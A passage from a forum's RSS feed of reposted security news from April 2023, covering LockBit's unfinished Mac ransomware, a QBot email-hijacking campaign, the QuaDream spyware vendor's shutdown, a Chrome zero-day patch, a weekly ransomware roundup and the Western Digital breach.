	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/new-chameleon-android-malware-mimics-bank-govt-and-crypto-apps/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">14592</guid><pubDate>Mon, 17 Apr 2023 18:42:17 +0000</pubDate></item><item><title>LockBit ransomware may target Mac devices</title><link>https://nsaneforums.com/news/security-privacy-news/lockbit-ransomware-may-target-mac-devices-r14587/</link><description><![CDATA[<p>
	<span style="font-size:14px;">The LockBit ransomware gang is targeting Mac devices with its malware. The group has an infamous track record for attacking Windows, Linux, and virtual host machines such as VMware ESXi.</span>
</p>

<h3>
	<span style="font-size:14px;">LockBit ransomware for Mac payload spotted by experts</span>
</h3>

<p>
	<span style="font-size:14px;">The Mac version of LockBit was <a href="https://twitter.com/malwrhunterteam/status/1647535642232889346" rel="external nofollow">spotted</a> by the folks at MalwareHunterTeam. The archive that they analyzed contained a file that was called Locker_Apple_M1_64, which suggests that the ransomware is targeting Apple Silicon M1 systems.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The security experts investigated a sample of the malware's archive, which was uploaded to <a href="https://www.virustotal.com/gui/file/bf3ebc294870a6e743f021f4e18be75810149a1004b8d7c8a1e91f35562db3f5/details" rel="external nofollow">VirusTotal</a> on March 20th of this year. The findings also revealed that a LockBit ransomware for PowerPC Macs exists. Security researcher Florian Roth spotted an earlier <a href="https://www.virustotal.com/gui/file/0be6f1e927f973df35dad6fc661048236d46879ad59f824233d757ec6e722bde/details" rel="external nofollow">report</a> of the malware from December 2022. Vx-underground, which hosts malware source code and samples, also <a href="https://twitter.com/vxunderground/status/1647424861810065410" rel="external nofollow">confirmed</a> that the first payload of LockBit ransomware for Mac has surfaced online. The analysts also pointed out that the Mac ransomware has actually existed for about 6 months, since November 2022.</span>
</p>

<p>
	 
</p>

<p>
	<img alt="LockBit-ransomware-for-Mac-payload-spott" class="ipsImage" data-ratio="75.10" height="540" width="615" src="https://www.ghacks.net/wp-content/uploads/2023/04/LockBit-ransomware-for-Mac-payload-spotted-by-experts.jpg" />
</p>

<h4>
	<span style="font-size:14px;">Security researchers say that the ransomware is not ready for deployment</span>
</h4>

<p>
	<span style="font-size:14px;">Numerous reports from other security researchers claim that the LockBit ransomware for Macs is likely a test version. Azim Khodjibaev of Cisco Talos stated that their research suggests that the ransomware is not ready for deployment.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Patrick Wardle, another macOS security expert, echoed the sentiment, saying that the encryptor is not in a completed form. He mentioned that the Mac malware is a basic version based on the Linux build, and doesn't run easily on macOS. In case you didn't know, ransomware tools encrypt the data on impacted computers. LockBit's current Mac version is also not capable of bypassing TCC (Transparency, Consent, and Control) in macOS. The researcher also explained in a <a href="https://objective-see.org/blog/blog_0x75.html" rel="external nofollow">blog post</a> that the malware crashes due to a bug in its code. A snippet of the ransomware contained strings related to Windows artifacts, which shows that the code was originally written for Windows. Some of these strings were shared among other versions that targeted other platforms, meaning that the malware has a shared codebase. Wardle says that in its current form, the malware cannot infect macOS, and that users do not need to be worried about the safety of their Macs.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Brett Callow, a threat analyst at Emsisoft, also chimed in, <a href="https://twitter.com/BrettCallow/status/1647707332229382146" rel="external nofollow">saying</a> that there is no evidence to indicate that LockBit's macOS variant has been used in a cyberattack. But he acknowledged the fact that the hackers compiling a macOS version does show their intention of targeting Macs.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">This was later confirmed by LockBitSupp, a representative of the ransomware gang, who told <a href="https://www.bleepingcomputer.com/news/security/lockbit-ransomware-encryptors-found-targeting-mac-devices/" rel="external nofollow">BleepingComputer</a> that the group is indeed working on a version for Mac. So, while that may sound alarming, there is no reason to panic right now, as the malware isn't ready yet. LockBit has offered its services to other attackers via its ransomware-as-a-service (RaaS) model, so it is possible that some cybercriminals could use it to target Mac users.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">A <a href="https://www.ghacks.net/2023/01/03/ransomware-gangs-limits-decryptor-childrens-hospital/" rel="external nofollow">few months ago</a>, the LockBit ransomware gang released a free decryptor for a children’s hospital in Canada, after a "rogue member" attacked the healthcare organization. While we are talking about security stuff, a recent report by Citizen Lab and Microsoft revealed details about how a Pegasus-like spyware called <a href="https://www.ghacks.net/2023/04/12/pegasus-like-spyware-reign-was-used-in-targeted-iphone-attacks/" rel="external nofollow">Reign</a> was used for targeted attacks on iPhones.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.ghacks.net/2023/04/17/lockbit-ransomware-may-target-mac-devices/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">14587</guid><pubDate>Mon, 17 Apr 2023 18:35:38 +0000</pubDate></item><item><title>New QBot Banking Trojan Campaign Hijacks Business Emails to Spread Malware</title><link>https://nsaneforums.com/news/security-privacy-news/new-qbot-banking-trojan-campaign-hijacks-business-emails-to-spread-malware-r14566/</link><description><![CDATA[<p>
	A new QBot malware campaign is leveraging hijacked business correspondence to trick unsuspecting victims into installing the malware, new findings from Kaspersky reveal.
</p>

<p>
	 
</p>

<p>
	The latest activity, which commenced on April 4, 2023, has primarily targeted users in Germany, Argentina, Italy, Algeria, Spain, the U.S., Russia, France, the U.K., and Morocco.
</p>

<p>
	 
</p>

<p>
	QBot (aka Qakbot or Pinkslipbot) is a banking trojan that's known to be active since at least 2007. Besides stealing passwords and cookies from web browsers, it doubles up as a backdoor to inject next-stage payloads such as Cobalt Strike or ransomware.
</p>

<p>
	 
</p>

<p>
	Distributed via phishing campaigns, the malware has seen constant updates during its lifetime that pack in anti-VM, anti-debugging, and anti-sandbox techniques to evade detection. It has also emerged as the most prevalent malware for the month of March 2023, per Check Point.
</p>

<p>
	 
</p>

<p>
	"Early on, it was distributed through infected websites and pirated software," Kaspersky researchers said, explaining QBot's distribution methods.
</p>

<p>
	 
</p>

<p>
	"Now the banker is delivered to potential victims through malware already residing on their computers, social engineering, and spam mailings."
</p>

<p>
	 
</p>

<p>
	Email thread hijacking attacks are not new. They occur when cybercriminals insert themselves into existing business conversations or initiate new conversations based on information previously gleaned from compromised email accounts.
</p>

<p>
	 
</p>

<p>
	The goal is to entice victims into opening malicious links or malicious attachments, in this case, an enclosed PDF file that masquerades as a Microsoft Office 365 or Microsoft Azure alert.
</p>

<p>
	 
</p>

<p>
	Opening the document leads to the retrieval of an archive file from an infected website that, in turn, contains an obfuscated Windows Script File (.WSF). The script, for its part, incorporates a PowerShell script that downloads a malicious DLL from a remote server. The downloaded DLL is the QBot malware.
</p>

<p>
	 
</p>

<p>
	The findings come as Elastic Security Labs unearthed a multi-stage social engineering campaign that employs weaponized Microsoft Word documents to distribute Agent Tesla and XWorm by means of a custom .NET-based loader.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2023/04/new-qbot-banking-trojan-campaign.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">14566</guid><pubDate>Mon, 17 Apr 2023 17:19:47 +0000</pubDate></item><item><title>Israeli Spyware Vendor QuaDream to Shut Down Following Citizen Lab and Microsoft Expose</title><link>https://nsaneforums.com/news/security-privacy-news/israeli-spyware-vendor-quadream-to-shut-down-following-citizen-lab-and-microsoft-expose-r14565/</link><description><![CDATA[<p>
	Israeli spyware vendor QuaDream is allegedly shutting down its operations in the coming days, less than a week after its hacking toolset was exposed by Citizen Lab and Microsoft.
</p>

<p>
	 
</p>

<p>
	The development was reported by the Israeli business newspaper Calcalist, citing unnamed sources, adding the company "hasn't been fully active for a while" and that it "has been in a difficult situation for several months."
</p>

<p>
	 
</p>

<p>
	The company's board of directors is looking to sell off its intellectual property, the report further added.
</p>

<p>
	 
</p>

<p>
	News of the purported shutdown comes as the firm's spyware framework – dubbed REIGN – was outed as having been used against journalists, political opposition figures, and NGO workers across North America, Central Asia, Southeast Asia, Europe, and the Middle East.
</p>

<p>
	 
</p>

<p>
	Microsoft described REIGN as a "suite of exploits, malware, and infrastructure designed to exfiltrate data from mobile devices."
</p>

<p>
	 
</p>

<p>
	The attacks entailed the exploitation of a now-patched flaw in iOS to deploy sophisticated surveillanceware capable of surreptitiously gathering sensitive information, including audio, pictures, passwords, files, and locations.
</p>

<p>
	 
</p>

<p>
	Apple told The Hacker News last week that there was no indication to suggest that the exploit, codenamed ENDOFDAYS, has been put to use since the company released iOS 14.4.2 in March 2021.
</p>

<p>
	 
</p>

<p>
	QuaDream, like its Israeli counterparts NSO Group and Candiru, is a private-sector offensive actor (PSOA) that markets end-to-end hacking tools that can be utilized by its customers in running the operations.
</p>

<p>
	 
</p>

<p>
	While the company has largely managed to stay under the shadows, Haaretz reported in June 2021 that its spyware technology was sold to Saudi Arabia to carry out zero-click attacks against targets of interest.
</p>

<p>
	 
</p>

<p>
	Then last year, Reuters revealed that QuaDream had independently developed an exploit to break into iPhones that's comparable to the one provided by NSO Group by leveraging a flaw in iMessage. Apple addressed the vulnerability in September 2021.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2023/04/israeli-spyware-vendor-quadream-to-shut.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">14565</guid><pubDate>Mon, 17 Apr 2023 17:18:10 +0000</pubDate></item><item><title>To Combat Generative AI Email Threats, Fight Fire With Fire</title><link>https://nsaneforums.com/news/security-privacy-news/to-combat-generative-ai-email-threats-fight-fire-with-fire-r14560/</link><description><![CDATA[<p>
	 
</p>

<p>
	Human brain power is no match for hackers emboldened with artificial intelligence-powered digital smash-and-grab attacks using email deceptions. Consequently, cybersecurity defenses must be guided by AI solutions that know hackers’ strategies better than they do.
</p>

<p>
	 
</p>

<p>
	This approach of fighting AI with better AI surfaced as an ideal strategy in research conducted in March by cyber firm Darktrace to sniff out insights into human behavior around email. The survey confirmed the need for new cyber tools to counter AI-driven hacker threats targeting businesses.
</p>

<p>
	 
</p>

<p>
	The study sought a better understanding of how employees globally react to potential security threats. It also charted their growing knowledge of the need for better email security.
</p>

<p>
	 
</p>

<p>
	Darktrace’s global survey of 6,711 employees across the U.S., U.K., France, Germany, Australia, and the Netherlands found that respondents experienced a 135% increase in “novel social engineering attacks” across thousands of active Darktrace email customers from January to February 2023. The results corresponded with the widespread adoption of ChatGPT.
</p>

<p>
	 
</p>

<p>
	These novel social engineering attacks use sophisticated linguistic techniques, including increased text volume, punctuation, and sentence length with no links or attachments. The trend suggests that generative AI, such as ChatGPT, is providing an avenue for threat actors to craft sophisticated and targeted attacks at speed and scale, according to researchers.
</p>

<p>
	 
</p>

<p>
	One of the three most significant takeaways from the research is that most employees are concerned about the threat of AI-generated emails, according to Max Heinemeyer, chief product officer for Darktrace.
</p>

<p>
	 
</p>

<p>
	“This is not surprising, since these emails are often indistinguishable from legitimate communications and some of the signs that employees typically look for to spot a ‘fake’ include signals like poor spelling and grammar, which chatbots are proving highly efficient at circumventing,” he told TechNewsWorld.
</p>

<p>
	<br />
	<span style="font-size:22px;"><strong>Research Highlights</strong></span>
</p>

<p>
	 
</p>

<p>
	Darktrace asked retail, catering, and leisure companies how concerned they are, if at all, that hackers can use generative AI to create scam emails indistinguishable from genuine communication. Eighty-two percent said they are concerned.
</p>

<p>
	 
</p>

<p>
	More than half of all respondents indicated their awareness of what makes employees think an email is a phishing attack. The top three are invitations to click a link or open an attachment (68%), unknown sender or unexpected content (61%), and poor use of spelling and grammar (61%).
</p>

<p>
	 
</p>

<p>
	That is significant and troubling, as 45% of Americans surveyed noted that they had fallen prey to a fraudulent email, according to Heinemeyer. 
</p>

<p>
	“It is unsurprising that employees are concerned about their ability to verify the legitimacy of email communications in a world where AI chatbots are increasingly able to mimic real-world conversations and generate emails that lack all of the common signs of a phishing attack, such as malicious links or attachments,” he said.
</p>

<p>
	 
</p>

<p>
	Other key results of the survey include the following:
</p>

<p>
	 
</p>

<ul>
	<li>
		70% of global employees have noticed an increase in the frequency of scam emails and texts in the last six months
	</li>
</ul>

<p>
	 
</p>

<ul>
	<li>
		87% of global employees are concerned about the amount of personal information available about them online that could be used in phishing and other email scams
	</li>
</ul>

<p>
	 
</p>

<ul>
	<li>
		35% of respondents have tried ChatGPT or other gen AI chatbots
	</li>
</ul>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>Human Error Guardrails</strong></span>
</p>

<p>
	 
</p>

<p>
	Widespread accessibility to generative AI tools like ChatGPT and the increasing sophistication of nation-state actors means that email scams are more convincing than ever, noted Heinemeyer.
</p>

<p>
	 
</p>

<p>
	Innocent human error and insider threats remain an issue. Misdirecting an email is a risk for every employee and every organization. Nearly two in five people have sent an important email to the wrong recipient with a similar-looking alias by mistake or due to autocomplete. This error rises to over half (51%) in the financial services industry and 41% in the legal sector.
</p>

<p>
	 
</p>

<p>
	Regardless of fault, such human errors add another layer of security risk that is not malicious. A self-learning system can spot this error before the sensitive information is incorrectly shared.
</p>

<p>
	 
</p>

<p>
	In response, Darktrace unveiled a significant update to its globally deployed email solution. It helps to bolster email security tools as organizations continue to rely on email as their primary collaboration and communication tool.
</p>

<p>
	 
</p>

<p>
	“Email security tools that rely on knowledge of past threats are failing to future-proof organizations and their people against evolving email threats,” he said.
</p>

<p>
	 
</p>

<p>
	Darktrace’s latest email capability includes behavioral detections for misdirected emails that prevent intellectual property or confidential information from being sent to the wrong recipient, according to Heinemeyer.
</p>

<p>
	<br />
	<span style="font-size:22px;"><strong>AI Cybersecurity Initiative</strong></span>
</p>

<p>
	 
</p>

<p>
	By understanding what is normal, AI defenses can determine what does not belong in a particular individual’s inbox. Email security systems get this wrong too often, with 79% of respondents saying that their company’s spam/security filters incorrectly stop important legitimate emails from reaching their inbox.
</p>

<p>
	 
</p>

<p>
	With a deep understanding of the organization and how the individuals within it interact with their inbox, AI can determine for every email whether it is suspicious and should be actioned or if it is legitimate and should remain untouched.
</p>

<p>
	 
</p>

<p>
	“Tools that work from a knowledge of historical attacks will be no match for AI-generated attacks,” offered Heinemeyer.
</p>

<p>
	 
</p>

<p>
	Attack analysis shows a notable linguistic deviation — semantically and syntactically — compared to other phishing emails. That leaves little doubt that traditional email security tools, which work from a knowledge of historical threats, will fall short of picking up the subtle indicators of these attacks, he explained.
</p>

<p>
	 
</p>

<p>
	Bolstering this, Darktrace’s research revealed that email security solutions, including native, cloud, and static AI tools, take an average of 13 days following the launch of an attack on a victim until the breach is detected.
</p>

<p>
	 
</p>

<p>
	“That leaves defenders vulnerable for almost two weeks if they rely solely on these tools. AI defenses that understand the business will be crucial for spotting these attacks,” he said.
</p>

<p>
	<br />
	<span style="font-size:22px;"><strong>AI-Human Partnerships Needed</strong></span>
</p>

<p>
	 
</p>

<p>
	Heinemeyer believes the future of email security lies in a partnership between AI and humans. In this arrangement, the algorithms are responsible for determining whether the communication is malicious or benign, thereby taking the burden of responsibility away from the human.
</p>

<p>
	 
</p>

<p>
	“Training on good email security practices is important, but it will not be enough to stop AI-generated threats that look exactly like benign communications,” he warned.
</p>

<p>
	 
</p>

<p>
	One of the vital revolutions AI enables in the email space is a deep understanding of “you.” Instead of trying to predict attacks, an understanding of your employees’ behaviors must be determined based on their email inbox, their relationships, tone, sentiments, and hundreds of other data points, he reasoned.
</p>

<p>
	 
</p>

<p>
	“By leveraging AI to combat email security threats, we not only reduce risk but revitalize organizational trust and contribute to business outcomes. In this scenario, humans are freed up to work on higher-level, more strategic practices,” he said.
</p>

<p>
	<br />
	<span style="font-size:22px;"><strong>Not a Completely Unsolvable Cybersecurity Problem</strong></span>
</p>

<p>
	 
</p>

<p>
	The threat of offensive AI has been researched on the defensive side for a decade. Attackers will inevitably use AI to upskill their operations and maximize ROI, noted Heinemeyer.
</p>

<p>
	 
</p>

<p>
	“But this is not something we would consider unsolvable from a defense perspective. Ironically, generative AI may be worsening the social engineering challenge, but AI that knows you could be the parry,” he predicted.
</p>

<p>
	 
</p>

<p>
	Darktrace has tested offensive AI prototypes against the company’s technology to continuously test the efficacy of its defenses ahead of this inevitable evolution in the attacker landscape. The company is confident that AI armed with a deep understanding of the business will be the most powerful way to defend against these threats as they continue to evolve.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.technewsworld.com/story/to-combat-generative-ai-email-threats-fight-fire-with-fire-178137.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">14560</guid><pubDate>Mon, 17 Apr 2023 00:52:39 +0000</pubDate></item><item><title>Microsoft released special Defender update for Windows 11, Windows 10 install images</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-released-special-defender-update-for-windows-11-windows-10-install-images-r14547/</link><description><![CDATA[<p>
	Microsoft recently released a new Defender anti-malware update package for Windows OS installation images, i.e., for the Windows Imaging Format (WIM) and VHD (Virtual Hard Disk) formats. The new definitions support Windows 11, all editions of Windows 10, and Windows Server 2016 and 2019. This update package is necessary because a Windows installation image may contain old, outdated anti-malware definitions and software binaries, leaving a freshly installed system unprotected until it fetches current definitions. Aside from better security, these updates can also provide performance benefits in some cases.
</p>

<p>
	 
</p>

<p>
	Microsoft is delivering the latest security definitions for Windows images via security intelligence update version 1.385.1537.0. The Defender package version is 20230330.2. On the support document describing the new update, <a href="https://support.microsoft.com/en-us/topic/microsoft-defender-update-for-windows-operating-system-installation-images-1c89630b-61ff-00a1-04e2-2d1f3865450d" rel="external nofollow">Microsoft writes</a>:
</p>

<p>
	 
</p>

<p>
	The first hours of a newly installed Windows deployment can leave the system vulnerable because of a Microsoft Defender protection gap. This is because the OS installation images may contain outdated antimalware software binaries.
</p>

<p>
	 
</p>

<p>
	[..] Devices using either the Windows built-in antivirus or another security solution can benefit from these updates.
</p>

<p>
	 
</p>

<p>
	[..] This article describes the antimalware update package for Microsoft Defender in the OS installation images (WIM and VHD files). This feature supports the following OS installation images:
</p>

<p>
	 
</p>

<ul>
	<li>
		Windows 11
	</li>
	<li>
		Windows 10 (Enterprise, Pro, and Home editions)
	</li>
	<li>
		Windows Server 2019
	</li>
	<li>
		Windows Server 2016
	</li>
</ul>

<p>
	 
</p>

<p>
	Version information
</p>

<p>
	 
</p>

<ul>
	<li>
		Defender package version: <strong>20230330.2</strong>
	</li>
</ul>

<p>
	 
</p>

<p>
	This package updates the anti-malware client, anti-malware engine, and signature versions in the OS installation images to the following versions:
</p>

<p>
	 
</p>

<ul>
	<li>
		Platform version: <strong>4.18.2302.7</strong>
	</li>
	<li>
		Engine version: <strong>1.1.20100.6</strong>
	</li>
	<li>
		Security intelligence version: <strong>1.385.1537.0</strong>
	</li>
</ul>

<p>
	 
</p>

<p>
	From Microsoft's security bulletin, we learn that the security intelligence update <a href="https://www.microsoft.com/en-us/wdsi/definitions/antimalware-definition-release-notes?requestVersion=1.385.1537.0" rel="external nofollow">version 1.385.1537.0</a> was released at the end of last month. It adds threat detections for various trojans, hacktools, and ransomware, among others. For those wondering, the latest intelligence update is version 1.387.1114.0 at the time of writing.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/microsoft-released-special-defender-update-for-windows-11-windows-10-install-images/" rel="external nofollow">Microsoft released special Defender update for Windows 11, Windows 10 install images</a>
</p>
]]></description><guid isPermaLink="false">14547</guid><pubDate>Sat, 15 Apr 2023 19:32:00 +0000</pubDate></item><item><title>Google Releases Urgent Chrome Update to Fix Actively Exploited Zero-Day Vulnerability</title><link>https://nsaneforums.com/news/security-privacy-news/google-releases-urgent-chrome-update-to-fix-actively-exploited-zero-day-vulnerability-r14541/</link><description><![CDATA[<p>
	Google on Friday released out-of-band updates to resolve an actively exploited zero-day flaw in its Chrome web browser, making it the first such bug to be addressed since the start of the year.
</p>

<p>
	 
</p>

<p>
	Tracked as CVE-2023-2033, the high-severity vulnerability has been described as a type confusion issue in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on April 11, 2023.
</p>

<p>
	 
</p>

<p>
	"Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page," according to the NIST's National Vulnerability Database (NVD).
</p>

<p>
	 
</p>

<p>
	The tech giant acknowledged that "an exploit for CVE-2023-2033 exists in the wild," but stopped short of sharing additional technical specifics or indicators of compromise (IoCs) to prevent further exploitation by threat actors.
</p>

<p>
	 
</p>

<p>
	CVE-2023-2033 also appears to share similarities with CVE-2022-1096, CVE-2022-1364, CVE-2022-3723, and CVE-2022-4262 – four other actively abused type confusion flaws in V8 that were remediated by Google in 2022.
</p>

<p>
	 
</p>

<p>
	Google closed out a total of nine zero-days in Chrome last year. The development comes days after Citizen Lab and Microsoft disclosed the exploitation of a now-patched flaw in Apple iOS by customers of a shadowy spyware vendor named QuaDream to target journalists, political opposition figures, and an NGO worker in 2021.
</p>

<p>
	 
</p>

<p>
	Users are recommended to upgrade to version 112.0.5615.121 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2023/04/google-releases-urgent-chrome-update-to.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">14541</guid><pubDate>Sat, 15 Apr 2023 16:04:43 +0000</pubDate></item><item><title>The Week in Ransomware - April 14th 2023 - A Focus on Stolen Data</title><link>https://nsaneforums.com/news/security-privacy-news/the-week-in-ransomware-april-14th-2023-a-focus-on-stolen-data-r14540/</link><description><![CDATA[<p>
	It has been mostly a quiet week regarding ransomware, with only a few bits of info released on older attacks and some reports released on existing organizations.
</p>

<p>
	 
</p>

<p>
	This week, theft of customer data remains the focus, with <a href="https://www.bleepingcomputer.com/news/security/kfc-pizza-hut-owner-discloses-data-breach-after-ransomware-attack/" target="_blank" rel="external nofollow">Yum! Brands sending data breach notifications</a> for a ransomware attack in January.
</p>

<p>
	 
</p>

<p>
	Capita also remains silent on the Black Basta ransomware attack it suffered earlier this month, including whether customer data was stolen, even as the <a href="http://doublepulsar.com/black-basta-ransomware-group-extorts-capita-with-stolen-customer-data-capita-fumble-response-9c3ca6c3b283" rel="external nofollow" target="_blank">ransomware gang attempts to extort them</a>.
</p>

<p>
	 
</p>

<p>
	Other news this week revolves around research released about particular operations, including:
</p>

<p>
	 
</p>

<ul>
	<li>
		DarkAngels ransomware launched a data leak site.
	</li>
	<li>
		Vice Society now uses a custom PowerShell script for data exfiltration.
	</li>
	<li>
		A technical analysis of Trigona, which BleepingComputer <a href="https://www.bleepingcomputer.com/news/security/trigona-ransomware-spotted-in-increasing-attacks-worldwide/" target="_blank" rel="external nofollow">first reported</a> on in 2022.
	</li>
	<li>
		Information on the new Kadavro Vector Ransomware.
	</li>
</ul>

<p>
	 
</p>

<p>
	Finally, we saw LockBit messing around with cybersecurity companies, claiming to have breached Darktrace. However, the company said this is untrue and that no systems were compromised.
</p>

<p>
	 
</p>

<p>
	Contributors and those who provided new ransomware information and stories this week include <a href="https://twitter.com/LawrenceAbrams" rel="external nofollow" target="_blank">@LawrenceAbrams</a>, <a href="https://twitter.com/demonslay335" rel="external nofollow" target="_blank">@demonslay335</a>, <a href="https://twitter.com/malwareforme" rel="external nofollow" target="_blank">@malwareforme</a>, <a href="https://twitter.com/malwrhunterteam" rel="external nofollow" target="_blank">@malwrhunterteam</a>, <a href="https://twitter.com/fwosar" rel="external nofollow" target="_blank">@fwosar</a>, <a href="https://twitter.com/BleepinComputer" rel="external nofollow" target="_blank">@BleepinComputer</a>, <a href="https://twitter.com/Seifreed" rel="external nofollow" target="_blank">@Seifreed</a>, <a href="https://twitter.com/struppigel" rel="external nofollow" target="_blank">@struppigel</a>, <a href="https://twitter.com/billtoulas" rel="external nofollow" target="_blank">@billtoulas</a>, <a href="https://twitter.com/Ionut_Ilascu" rel="external nofollow" target="_blank">@Ionut_Ilascu</a>, <a href="https://twitter.com/serghei" rel="external nofollow" target="_blank">@serghei</a>, <a href="https://twitter.com/McAfee" rel="external nofollow" target="_blank">@McAfee</a>, <a href="https://twitter.com/fortinet" rel="external nofollow" target="_blank">@Fortinet</a>, <a href="https://twitter.com/Threatlabz" rel="external nofollow" target="_blank">@Threatlabz</a>, <a href="https://twitter.com/pcrisk" rel="external nofollow" target="_blank">@pcrisk</a>, and <a href="https://infosec.exchange/@GossiTheDog@cyberplace.social" rel="external nofollow" target="_blank">@GossiTheDog</a>.
</p>

<h2>
	April 9th 2023
</h2>

<h3 data-selectable-paragraph="">
	<a href="https://doublepulsar.com/black-basta-ransomware-group-extorts-capita-with-stolen-customer-data-capita-fumble-response-9c3ca6c3b283" rel="external nofollow" target="_blank">Black Basta ransomware group extorts Capita with stolen customer data, Capita fumble response.</a>
</h3>

<p>
	In terms of Black Basta and Capita, they list Capita as currently being held to extortion – and provide evidence of exfiltrated data. This includes primary and secondary school job applications, a Capita nuclear document, Capita documents marked Confidential, passport scans, security vetting for customers and architecture diagrams.
</p>

<h2>
	April 10th 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/kfc-pizza-hut-owner-discloses-data-breach-after-ransomware-attack/" target="_blank" rel="external nofollow">KFC, Pizza Hut owner discloses data breach after ransomware attack</a>
</h3>

<p>
	Yum! Brands, the brand owner of the KFC, Pizza Hut, and Taco Bell fast food chains, is now sending data breach notification letters to an undisclosed number of individuals whose personal information was stolen in a January 13 ransomware attack.
</p>

<h3>
	<a href="https://twitter.com/Threatlabz/status/1645455117024641024" rel="external nofollow" target="_blank">DarkAngels ransomware launches data leak site</a>
</h3>

<p>
	Zscaler discovered that DarkAngels ransomware (AKA RansomHouse) launched a data leak site.
</p>

<h2>
	April 11th 2023
</h2>

<h3>
	<a href="https://twitter.com/pcrisk/status/1645711055245529088" rel="external nofollow" target="_blank">New STOP Ransomware variant</a>
</h3>

<p>
	PCrisk found a new STOP ransomware variant that appends the .kiop extension.
</p>

<h2>
	April 14th 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/darktrace-investigation-found-no-evidence-of-lockbit-breach/" target="_blank" rel="external nofollow">Darktrace: Investigation found no evidence of LockBit breach</a>
</h3>

<p>
	Cybersecurity firm Darktrace says it found no evidence that the LockBit ransomware gang breached its network after the group added an entry to their dark web leak platform, implying that they stole data from the company's systems.
</p>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/vice-society-ransomware-uses-new-powershell-data-theft-tool-in-attacks/" target="_blank" rel="external nofollow">Vice Society ransomware uses new PowerShell data theft tool in attacks</a>
</h3>

<p>
	The Vice Society ransomware gang is deploying a new, rather sophisticated PowerShell script to automate data theft from compromised networks.
</p>

<h3>
	<a href="https://www.zscaler.com/blogs/security-research/technical-analysis-trigona-ransomware" rel="external nofollow" target="_blank">Technical Analysis of Trigona Ransomware</a>
</h3>

<p>
	Zscaler ThreatLabz has been tracking the Trigona ransomware family, which dates back to June 2022. There has been <a aria-label=" - link opens in new tab" href="https://areteir.com/static/5055b091d5c24a9ed63a06d70f2da20e/Trigona-Report_020224_web.pdf" rel="external nofollow" target="_blank">public reporting</a> that some of the group’s tactics, techniques, and procedures (TTPs) have overlapped with BlackCat/ALPHV ransomware.
</p>

<h3>
	<a href="https://www.fortinet.com/blog/threat-research/ransomware-roundup-kadavro-vector-ransomware" rel="external nofollow" target="_blank">Ransomware Roundup – Kadavro Vector Ransomware</a>
</h3>

<p>
	FortiGuard Labs recently came across a ransomware named “Kadavro Vector”, a NoCry ransomware variant that encrypts files on compromised machines and demands a ransom in Monero (XMR) cryptocurrency for file decryption.
</p>

<h3>
	That's it for this week! Hope everyone has a nice weekend!
</h3>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-14th-2023-a-focus-on-stolen-data/" rel="external nofollow">The Week in Ransomware - April 14th 2023 - A Focus on Stolen Data</a>
</p>
]]></description><guid isPermaLink="false">14540</guid><pubDate>Sat, 15 Apr 2023 08:08:19 +0000</pubDate></item><item><title>One of the hackers who claims to have breached Western Digital's network has come forward</title><link>https://nsaneforums.com/news/security-privacy-news/one-of-the-hackers-who-claims-to-have-breached-western-digitals-network-has-come-forward-r14519/</link><description><![CDATA[<p>
	Western Digital is still dealing with the fallout of a breach of its network that happened in late March. On Thursday, a person who claims to have been a part of that cyberattack came forward, stating that the hackers took 10TB of data from Western Digital.
</p>

<p>
	 
</p>

<p>
	TechCrunch has communicated with this unnamed individual, who offered evidence that they were part of the attack:
</p>

<p>
	 
</p>

<p>
	<em>The hacker shared a file that was digitally signed with Western Digital’s code-signing certificate, showing they could now digitally sign files to impersonate Western Digital. Two security researchers also looked at the file and agreed it is signed with the company’s certificate.</em>
</p>

<p>
	 
</p>

<p>
	The hacker claims that they want to be paid a ransom with a "minimum 8 figures" amount from Western Digital, or they will release the data they collected publicly. The individual says some of the data comes from the company's customers, but there's no further information on what might be included.
</p>

<p>
	 
</p>

<p>
	A spokesperson for Western Digital would not give any comments about the hacker's claims when asked by TechCrunch. The company has so far been very vague about what exactly happened when its network was breached. Its My Cloud online storage service was down for about 10 days this month but it was fully restored earlier this week. Its web store, however, is still offline.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.neowin.net/news/one-of-the-hackers-who-claims-to-have-breached-western-digitals-network-has-come-forward/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">14519</guid><pubDate>Fri, 14 Apr 2023 16:20:28 +0000</pubDate></item><item><title>Microsoft warns accounting and tax return firms of a new phishing attack ahead of US Tax Day</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-warns-accounting-and-tax-return-firms-of-a-new-phishing-attack-ahead-of-us-tax-day-r14518/</link><description><![CDATA[<p>
